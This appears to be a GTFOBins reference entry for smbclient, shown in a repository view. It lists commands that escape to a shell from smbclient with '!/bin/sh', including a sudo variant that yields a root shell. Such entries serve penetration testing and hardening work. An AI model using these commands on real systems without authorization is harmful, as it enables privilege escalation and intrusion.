GTFOBins.github.io/_gtfobins/smbclient.md
2018-10-05 18:55:38 +01:00

13 lines
217 B
Markdown

---
description: A valid SMB/CIFS server must be available.
functions:
shell:
- code: |
smbclient \\ip\share
!/bin/sh
sudo:
- code: |
sudo smbclient \\ip\share
!/bin/sh
---